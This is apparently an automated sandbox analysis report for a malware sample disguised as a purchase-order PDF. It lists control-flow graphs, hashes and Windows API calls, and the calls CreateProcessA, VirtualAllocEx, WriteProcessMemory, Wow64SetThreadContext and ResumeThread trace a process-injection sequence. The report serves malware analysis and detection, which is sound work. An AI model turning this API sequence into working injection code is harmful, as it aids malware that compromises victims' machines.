                                                                                control_flow_graph 482 7c20036-7c200d5 484 7c200d7-7c200e1 482->484 485 7c2010e-7c2012e 482->485 484->485 486 7c200e3-7c200e5 484->486 492 7c20130-7c2013a 485->492 493 7c20167-7c20196 485->493 487 7c200e7-7c200f1 486->487 488 7c20108-7c2010b 486->488 490 7c200f3 487->490 491 7c200f5-7c20104 487->491 488->485 490->491 491->491 494 7c20106 491->494 492->493 495 7c2013c-7c2013e 492->495 499 7c20198-7c201a2 493->499 500 7c201cf-7c20289 CreateProcessA 493->500 494->488 497 7c20140-7c2014a 495->497 498 7c20161-7c20164 495->498 501 7c2014e-7c2015d 497->501 502 7c2014c 497->502 498->493 499->500 503 7c201a4-7c201a6 499->503 513 7c20292-7c20318 500->513 514 7c2028b-7c20291 500->514 501->501 504 7c2015f 501->504 502->501 505 7c201a8-7c201b2 503->505 506 7c201c9-7c201cc 503->506 504->498 508 7c201b6-7c201c5 505->508 509 7c201b4 505->509 506->500 508->508 510 7c201c7 508->510 509->508 510->506 524 7c2031a-7c2031e 513->524 525 7c20328-7c2032c 513->525 514->513 524->525 526 7c20320 524->526 527 7c2032e-7c20332 525->527 528 7c2033c-7c20340 525->528 526->525 527->528 529 7c20334 527->529 530 7c20342-7c20346 528->530 531 7c20350-7c20354 528->531 529->528 530->531 532 7c20348 530->532 533 7c20366-7c2036d 531->533 534 7c20356-7c2035c 531->534 532->531 535 7c20384 533->535 536 7c2036f-7c2037e 533->536 534->533 538 7c20385 535->538 536->535 538->538
                                                                                APIs
                                                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07C20276
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2223192289.0000000007C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7c20000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID: CreateProcess
                                                                                • String ID:
                                                                                • API String ID: 963392458-0
                                                                                • Opcode ID: 58cd857beb6e56cd54beabdee8cbdad5b65f30c660325fb22139cda0d5dc6958
                                                                                • Instruction ID: b282c905a798d526b85fe699dd9ebcc0e3b34cbb3620ac86ec3377cf65d31f76
                                                                                • Opcode Fuzzy Hash: 58cd857beb6e56cd54beabdee8cbdad5b65f30c660325fb22139cda0d5dc6958
                                                                                • Instruction Fuzzy Hash: 68914EB1D0022ACFDF14CF68C9817DEBBB2BF48310F14856AD849A7254DB749A86DF91
                                                                                Function 07C20040 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 539 7c20040-7c200d5 541 7c200d7-7c200e1 539->541 542 7c2010e-7c2012e 539->542 541->542 543 7c200e3-7c200e5 541->543 549 7c20130-7c2013a 542->549 550 7c20167-7c20196 542->550 544 7c200e7-7c200f1 543->544 545 7c20108-7c2010b 543->545 547 7c200f3 544->547 548 7c200f5-7c20104 544->548 545->542 547->548 548->548 551 7c20106 548->551 549->550 552 7c2013c-7c2013e 549->552 556 7c20198-7c201a2 550->556 557 7c201cf-7c20289 CreateProcessA 550->557 551->545 554 7c20140-7c2014a 552->554 555 7c20161-7c20164 552->555 558 7c2014e-7c2015d 554->558 559 7c2014c 554->559 555->550 556->557 560 7c201a4-7c201a6 556->560 570 7c20292-7c20318 557->570 571 7c2028b-7c20291 557->571 558->558 561 7c2015f 558->561 559->558 562 7c201a8-7c201b2 560->562 563 7c201c9-7c201cc 560->563 561->555 565 7c201b6-7c201c5 562->565 566 7c201b4 562->566 563->557 565->565 567 7c201c7 565->567 566->565 567->563 581 7c2031a-7c2031e 570->581 582 7c20328-7c2032c 570->582 571->570 581->582 583 7c20320 581->583 584 7c2032e-7c20332 582->584 585 7c2033c-7c20340 582->585 583->582 584->585 586 7c20334 584->586 587 7c20342-7c20346 585->587 588 7c20350-7c20354 585->588 586->585 587->588 589 7c20348 587->589 590 7c20366-7c2036d 588->590 591 7c20356-7c2035c 588->591 589->588 592 7c20384 590->592 593 7c2036f-7c2037e 590->593 591->590 595 7c20385 592->595 593->592 595->595
                                                                                APIs
                                                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07C20276
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2223192289.0000000007C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7c20000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID: CreateProcess
                                                                                • String ID:
                                                                                • API String ID: 963392458-0
                                                                                • Opcode ID: 47e498f04489b8f6e94da6a64e338db4ba931011fdae2e82a6a0f32b7ba2d4bc
                                                                                • Instruction ID: d9e9ac4578f562df6793d3bc6254d5c40573a6c5bb1af6aca1f651cf22aabd6a
                                                                                • Opcode Fuzzy Hash: 47e498f04489b8f6e94da6a64e338db4ba931011fdae2e82a6a0f32b7ba2d4bc
                                                                                • Instruction Fuzzy Hash: 1E914EB1D0022ACFDF14CF69C9817DEBBB2BF48310F14856AD809A7254DB749A86DF91
                                                                                Function 01A0B3C1 Relevance: 1.7, APIs: 1, Instructions: 203COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 596 1a0b3c1-1a0b3ce 597 1a0b3d0-1a0b3d4 596->597 598 1a0b3d5-1a0b3df 596->598 597->598 599 1a0b3e1-1a0b3ee call 1a09f4c 598->599 600 1a0b40b-1a0b40f 598->600 607 1a0b3f0 599->607 608 1a0b404 599->608 601 1a0b411-1a0b41b 600->601 602 1a0b423-1a0b464 600->602 601->602 609 1a0b471-1a0b47f 602->609 610 1a0b466-1a0b46e 602->610 655 1a0b3f6 call 1a0b668 607->655 656 1a0b3f6 call 1a0b659 607->656 608->600 612 1a0b481-1a0b486 609->612 613 1a0b4a3-1a0b4a5 609->613 610->609 611 1a0b3fc-1a0b3fe 611->608 614 1a0b540-1a0b5be 611->614 616 1a0b491 612->616 617 1a0b488-1a0b48f call 1a09f58 612->617 615 1a0b4a8-1a0b4af 613->615 648 1a0b5c0-1a0b5c4 614->648 649 1a0b5c5-1a0b600 614->649 619 1a0b4b1-1a0b4b9 615->619 620 1a0b4bc-1a0b4c3 615->620 618 1a0b493-1a0b4a1 616->618 617->618 618->615 619->620 622 1a0b4d0-1a0b4d9 call 1a09f68 620->622 623 1a0b4c5-1a0b4cd 620->623 629 1a0b4e6-1a0b4eb 622->629 630 1a0b4db-1a0b4e3 622->630 623->622 631 1a0b509-1a0b516 629->631 632 1a0b4ed-1a0b4f4 629->632 630->629 638 1a0b518-1a0b536 631->638 639 1a0b539-1a0b53f 631->639 632->631 634 1a0b4f6-1a0b506 call 1a09f78 call 1a0afbc 632->634 634->631 638->639 648->649 650 1a0b602-1a0b605 649->650 651 1a0b608-1a0b633 GetModuleHandleW 649->651 650->651 652 1a0b635-1a0b63b 651->652 653 1a0b63c-1a0b650 651->653 652->653 655->611 656->611
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2200363620.0000000001A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A00000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_1a00000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 0494210572acf3fc66d37ba9a098d7f99c6773df0a1a68669393fa543e7c0884
                                                                                • Instruction ID: 6020a968422d3fe4307406b5909ce0d73abb320dcdfaf1c7fb7ef49613a0119c
                                                                                • Opcode Fuzzy Hash: 0494210572acf3fc66d37ba9a098d7f99c6773df0a1a68669393fa543e7c0884
                                                                                • Instruction Fuzzy Hash: 30816570A00B058FD725CF29E64476ABBF5FF88300F10896DD58AD7A81EB35E945CBA0
                                                                                Function 01A0590C Relevance: 1.6, APIs: 1, Instructions: 101COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 657 1a0590c-1a0590e 658 1a05910-1a05912 657->658 659 1a05915-1a05916 657->659 660 1a05914 658->660 661 1a05919-1a0591c 658->661 662 1a05918 659->662 663 1a0591d-1a059d9 CreateActCtxA 659->663 660->659 661->663 662->661 665 1a059e2-1a05a3c 663->665 666 1a059db-1a059e1 663->666 673 1a05a4b-1a05a4f 665->673 674 1a05a3e-1a05a41 665->674 666->665 675 1a05a60 673->675 676 1a05a51-1a05a5d 673->676 674->673 678 1a05a61 675->678 676->675 678->678
                                                                                APIs
                                                                                • CreateActCtxA.KERNEL32(?), ref: 01A059C9
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2200363620.0000000001A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A00000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_1a00000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID: Create
                                                                                • String ID:
                                                                                • API String ID: 2289755597-0
                                                                                • Opcode ID: fd9b7d6806464eb9c88bc67eada10c4d61fd88ec1f46e8af3755baf6c4661f86
                                                                                • Instruction ID: b40977f4a9335b60d323c152785276f9bee9d2fa01caefaac6de9615d245b617
                                                                                • Opcode Fuzzy Hash: fd9b7d6806464eb9c88bc67eada10c4d61fd88ec1f46e8af3755baf6c4661f86
                                                                                • Instruction Fuzzy Hash: FF4114B0C00319CBDF25DFA9D884BCDBBB5BF49304F20806AD408AB291DB756946CF90
                                                                                Function 01A044F0 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 679 1a044f0-1a059d9 CreateActCtxA 684 1a059e2-1a05a3c 679->684 685 1a059db-1a059e1 679->685 692 1a05a4b-1a05a4f 684->692 693 1a05a3e-1a05a41 684->693 685->684 694 1a05a60 692->694 695 1a05a51-1a05a5d 692->695 693->692 697 1a05a61 694->697 695->694 697->697
                                                                                APIs
                                                                                • CreateActCtxA.KERNEL32(?), ref: 01A059C9
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2200363620.0000000001A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A00000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_1a00000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID: Create
                                                                                • String ID:
                                                                                • API String ID: 2289755597-0
                                                                                • Opcode ID: 9cd5322de04edb3b7cb46262a28d1935df67f303c41b9a7d2352a9fc33622cf1
                                                                                • Instruction ID: 3f8f8e181bd6a77f8fcddf7a20051f47939f5abf67f6ddf70ff8cc131f2101b4
                                                                                • Opcode Fuzzy Hash: 9cd5322de04edb3b7cb46262a28d1935df67f303c41b9a7d2352a9fc33622cf1
                                                                                • Instruction Fuzzy Hash: 2B41E2B0C0071DCBDB25DFAAC884B9DBBF5BF49304F20806AD418AB255DB756946CF90
                                                                                Function 0932FB3A Relevance: 1.6, APIs: 1, Instructions: 71injectionCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 698 932fb3a-932fb8e 701 932fb90-932fb9c 698->701 702 932fb9e-932fbdd WriteProcessMemory 698->702 701->702 704 932fbe6-932fc16 702->704 705 932fbdf-932fbe5 702->705 705->704
                                                                                APIs
                                                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0932FBD0
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2224157504.0000000009320000.00000040.00000800.00020000.00000000.sdmp, Offset: 09320000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_9320000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryProcessWrite
                                                                                • String ID:
                                                                                • API String ID: 3559483778-0
                                                                                • Opcode ID: 1644b94c919483f7a391ac442a143e2a86812d3bb46e84499c5b189365ff7d45
                                                                                • Instruction ID: d702e4f5fbc6ed8ee523c4cad6669693150e9529cd8ad8eb529b7f4505ac8707
                                                                                • Opcode Fuzzy Hash: 1644b94c919483f7a391ac442a143e2a86812d3bb46e84499c5b189365ff7d45
                                                                                • Instruction Fuzzy Hash: BC2128B59003599FDB10DFA9C885BDEBBF5FF48310F108429E959A7240C7789554CFA0
                                                                                Function 0932FB40 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 709 932fb40-932fb8e 711 932fb90-932fb9c 709->711 712 932fb9e-932fbdd WriteProcessMemory 709->712 711->712 714 932fbe6-932fc16 712->714 715 932fbdf-932fbe5 712->715 715->714
                                                                                APIs
                                                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0932FBD0
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2224157504.0000000009320000.00000040.00000800.00020000.00000000.sdmp, Offset: 09320000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_9320000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryProcessWrite
                                                                                • String ID:
                                                                                • API String ID: 3559483778-0
                                                                                • Opcode ID: bd1b1042288621df9e324caf16c7e040a505108166b0be6521a05534be6340fa
                                                                                • Instruction ID: fd8ea02907188f1f1dc5629090bda32f72028f6518766b0bf143a61f66148464
                                                                                • Opcode Fuzzy Hash: bd1b1042288621df9e324caf16c7e040a505108166b0be6521a05534be6340fa
                                                                                • Instruction Fuzzy Hash: 552127B59003599FDB10DFAAC885BEEBBF5FF48310F108429E919A7240C7789944CFA0
                                                                                Function 0932F9A0 Relevance: 1.6, APIs: 1, Instructions: 66threadCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 719 932f9a0-932f9f3 722 932fa03-932fa33 Wow64SetThreadContext 719->722 723 932f9f5-932fa01 719->723 725 932fa35-932fa3b 722->725 726 932fa3c-932fa6c 722->726 723->722 725->726
                                                                                APIs
                                                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0932FA26
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2224157504.0000000009320000.00000040.00000800.00020000.00000000.sdmp, Offset: 09320000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_9320000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID: ContextThreadWow64
                                                                                • String ID:
                                                                                • API String ID: 983334009-0
                                                                                • Opcode ID: 56b8a5e76d7a9e6e95721e215b6246b125d967d52b5fbf670ff18841f7c30fe8
                                                                                • Instruction ID: b9a4cae80b73f3ba0cdf7a96e27e70f7f281c36853569753ff29a2e8690e95b6
                                                                                • Opcode Fuzzy Hash: 56b8a5e76d7a9e6e95721e215b6246b125d967d52b5fbf670ff18841f7c30fe8
                                                                                • Instruction Fuzzy Hash: AA2139719003098FDB10DFAAC4857AEBBF4EF58314F54842AD559A7241C7789944CFA1
                                                                                Function 01A0B3B0 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 730 1a0b3b0-1a0da5c DuplicateHandle 733 1a0da65-1a0da82 730->733 734 1a0da5e-1a0da64 730->734 734->733
                                                                                APIs
                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,01A0D586,?,?,?,?,?), ref: 01A0DA4F
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2200363620.0000000001A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A00000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_1a00000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID: DuplicateHandle
                                                                                • String ID:
                                                                                • API String ID: 3793708945-0
                                                                                • Opcode ID: 6f011586380666b62f33ff9311368a65d172e96191b5a52016688d88071a9ea0
                                                                                • Instruction ID: 0e334b39adf8c77e7fc3d14202a2b8778ab37d387a4ed0e6547b90175081cbbe
                                                                                • Opcode Fuzzy Hash: 6f011586380666b62f33ff9311368a65d172e96191b5a52016688d88071a9ea0
                                                                                • Instruction Fuzzy Hash: AF21E5B59002489FDB10CF9AD584AEEBFF5EB48310F14841AE918A3350D378A940CFA0
                                                                                Function 0932FC2A Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0932FCB0
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2224157504.0000000009320000.00000040.00000800.00020000.00000000.sdmp, Offset: 09320000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_9320000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryProcessRead
                                                                                • String ID:
                                                                                • API String ID: 1726664587-0
                                                                                • Opcode ID: c25ab7490851c412bd5ab48fc23761e9050c517ceee511d4848cdc8854ec5ef8
                                                                                • Instruction ID: a79c8a1b352e1ca2dfb4fcd9b56c1a61a9630878276a6ddb742690a3f19c96e2
                                                                                • Opcode Fuzzy Hash: c25ab7490851c412bd5ab48fc23761e9050c517ceee511d4848cdc8854ec5ef8
                                                                                • Instruction Fuzzy Hash: 952116B5C003599FDB10DFAAC981AEEFBF5FF48310F50842AE919A7250C7389544DBA0
                                                                                Function 01A0D9C1 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,01A0D586,?,?,?,?,?), ref: 01A0DA4F
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2200363620.0000000001A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A00000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_1a00000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID: DuplicateHandle
                                                                                • String ID:
                                                                                • API String ID: 3793708945-0
                                                                                • Opcode ID: bb559b7f5a46bf007e64ded458803c5c486382b16a3ff5dd9ee0687957e24ca7
                                                                                • Instruction ID: 2955cf3ddc032a6d95a130cf6210d283c357fe74b3dd044e66f0ef6d66c16625
                                                                                • Opcode Fuzzy Hash: bb559b7f5a46bf007e64ded458803c5c486382b16a3ff5dd9ee0687957e24ca7
                                                                                • Instruction Fuzzy Hash: EE21E3B5D002489FDB10CF9AD584ADEBFF9FB48310F14841AE918A3350D378A940CFA1
                                                                                Function 0932F9A8 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0932FA26
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2224157504.0000000009320000.00000040.00000800.00020000.00000000.sdmp, Offset: 09320000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_9320000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID: ContextThreadWow64
                                                                                • String ID:
                                                                                • API String ID: 983334009-0
                                                                                • Opcode ID: ab822d18837fbd9bb702e891a9ce35bc729b0222504771d06aaf6f0b86d2c334
                                                                                • Instruction ID: a472ad72322c8450f0f1f092fad3786f740003ce7c6bd0b8a8ec06d38b672449
                                                                                • Opcode Fuzzy Hash: ab822d18837fbd9bb702e891a9ce35bc729b0222504771d06aaf6f0b86d2c334
                                                                                • Instruction Fuzzy Hash: 1F2129B1D003098FDB10DFAAC4857EEBBF4EF48314F14842AD559A7241DB789984CFA1
                                                                                Function 0932FC30 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0932FCB0
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2224157504.0000000009320000.00000040.00000800.00020000.00000000.sdmp, Offset: 09320000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_9320000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryProcessRead
                                                                                • String ID:
                                                                                • API String ID: 1726664587-0
                                                                                • Opcode ID: 0900fd92555e8b5800f9d32c79a7e58d10b0a18019c6ebd71eff889670fa7dfe
                                                                                • Instruction ID: 2337b2db65250d007b8842cdf343ae06adfd3a98022ef471f2308547578b13fb
                                                                                • Opcode Fuzzy Hash: 0900fd92555e8b5800f9d32c79a7e58d10b0a18019c6ebd71eff889670fa7dfe
                                                                                • Instruction Fuzzy Hash: BD2114B5C002599FDB10DFAAC980AEEBBF5FF48310F10842AE919A7250C7389940CBA0
                                                                                Function 0932FA7A Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0932FAEE
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2224157504.0000000009320000.00000040.00000800.00020000.00000000.sdmp, Offset: 09320000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_9320000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID: AllocVirtual
                                                                                • String ID:
                                                                                • API String ID: 4275171209-0
                                                                                • Opcode ID: 839cbcb0d6afc7f4c808a31b443bdd219ed24809c1fb5808a70d6f0b40e39525
                                                                                • Instruction ID: c70bef9f15d92eefd0e6a870ea86990a4469454be5c4dbf970aafa8e02162615
                                                                                • Opcode Fuzzy Hash: 839cbcb0d6afc7f4c808a31b443bdd219ed24809c1fb5808a70d6f0b40e39525
                                                                                • Instruction Fuzzy Hash: 451114B58002499BDB10DFAAC845AEEBFF5EF48320F14881AE519A7250CB79A544CFA1
                                                                                Function 0932FA80 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0932FAEE
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2224157504.0000000009320000.00000040.00000800.00020000.00000000.sdmp, Offset: 09320000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_9320000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID: AllocVirtual
                                                                                • String ID:
                                                                                • API String ID: 4275171209-0
                                                                                • Opcode ID: 9d078547707f4921a60bc51de6e206eae26d05f18561e726a0ad7a4ca2930eb4
                                                                                • Instruction ID: 56ca66c1a93e96284c8cfc94f5d4613f258df64b7f9b0b6bb9f060a49f233c90
                                                                                • Opcode Fuzzy Hash: 9d078547707f4921a60bc51de6e206eae26d05f18561e726a0ad7a4ca2930eb4
                                                                                • Instruction Fuzzy Hash: AA1149758002499FDB10DFAAC845AEFFFF5EF48320F108419E519A7250C779A540CFA0
                                                                                Function 0932F4B8 Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2224157504.0000000009320000.00000040.00000800.00020000.00000000.sdmp, Offset: 09320000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_9320000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID: ResumeThread
                                                                                • String ID:
                                                                                • API String ID: 947044025-0
                                                                                • Opcode ID: b05a2412d9b3b603e0d7d4ba79a3d1791d12e61b4047b1095fab0d9b23e838cb
                                                                                • Instruction ID: 7d9ff9dbbfb1246a517c430c878bf851cf1b8d733304cc612da9fea8bc1e4b73
                                                                                • Opcode Fuzzy Hash: b05a2412d9b3b603e0d7d4ba79a3d1791d12e61b4047b1095fab0d9b23e838cb
                                                                                • Instruction Fuzzy Hash: 6B1128B59002498FDB20DFAAD4457AFFBF5EF88324F248419D519A7240CB79A544CFA0
                                                                                Function 0932F4C0 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2224157504.0000000009320000.00000040.00000800.00020000.00000000.sdmp, Offset: 09320000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_9320000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID: ResumeThread
                                                                                • String ID:
                                                                                • API String ID: 947044025-0
                                                                                • Opcode ID: 6d55fe4fef9e88b204f087fd58ff8921167767c0110915a2b1a3a7cc0b6674ee
                                                                                • Instruction ID: 07e82d43ac6fe15685e5776f9e38cce246d11273359f151adf05beaec9fb73e0
                                                                                • Opcode Fuzzy Hash: 6d55fe4fef9e88b204f087fd58ff8921167767c0110915a2b1a3a7cc0b6674ee
                                                                                • Instruction Fuzzy Hash: 1A1125B19002498BDB20DFAAC4457AEFBF5EF88320F208419D519A7240CB79A944CFA0
                                                                                Function 01A0B5C0 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 01A0B626
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2200363620.0000000001A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A00000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_1a00000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID: HandleModule
                                                                                • String ID:
                                                                                • API String ID: 4139908857-0
                                                                                • Opcode ID: 8adfff82eb3721ff9c49e96c52845bf44cd4eab5a2ea0fa0eeb9dc41351f9673
                                                                                • Instruction ID: 246f7e08a48631b6482026c71bce784c2fddaef2d4c2487ad564c0375ff11cfd
                                                                                • Opcode Fuzzy Hash: 8adfff82eb3721ff9c49e96c52845bf44cd4eab5a2ea0fa0eeb9dc41351f9673
                                                                                • Instruction Fuzzy Hash: E3110FB5C003498FDB10DF9AD944A9EFBF4EF88310F10841AD519B7240C379A545CFA1
                                                                                Function 07C22849 Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PostMessageW.USER32(?,?,?,?), ref: 07C228AD
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2223192289.0000000007C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7c20000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID: MessagePost
                                                                                • String ID:
                                                                                • API String ID: 410705778-0
                                                                                • Opcode ID: da2823de5b29704cc7c9716268d34f8939fe13c26dbec8ea7d9c99a1538f49fd
                                                                                • Instruction ID: 62d51cd9b790ff1600fedc4d17edc16185759a92e501fa122b4275d7d322d7f1
                                                                                • Opcode Fuzzy Hash: da2823de5b29704cc7c9716268d34f8939fe13c26dbec8ea7d9c99a1538f49fd
                                                                                • Instruction Fuzzy Hash: E51100B68003499FDB10DF99D985BDEFBF8FB58320F10881AD558A7200C379A584CFA1
                                                                                Function 07C22850 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PostMessageW.USER32(?,?,?,?), ref: 07C228AD
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2223192289.0000000007C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7c20000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID: MessagePost
                                                                                • String ID:
                                                                                • API String ID: 410705778-0
                                                                                • Opcode ID: 6a18086ecfce1c264a428703bb0bf0885ccdbf283ed4f4f5ab0975228facd3e2
                                                                                • Instruction ID: 0d12195cb7a240cee990d013ae28bbc337fb0a7f10ea69891f063fc5a13a5d52
                                                                                • Opcode Fuzzy Hash: 6a18086ecfce1c264a428703bb0bf0885ccdbf283ed4f4f5ab0975228facd3e2
                                                                                • Instruction Fuzzy Hash: 5D11E5B58003599FDB10DF9AD485BDEFBF8FB48310F108419D558A7200C379A544CFA5
                                                                                Function 0164D3D8 Relevance: .1, Instructions: 75COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2200057038.000000000164D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0164D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_164d000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 5d2886a856024f936b50ca0b59e84a47417d6e9bf86b20beddcde7b61ad8dd61
                                                                                • Instruction ID: b0da9b9e587a6ba4ab0dda32c7d259bd82b2ce9fe6ac8b43a4d827d9f7d3e355
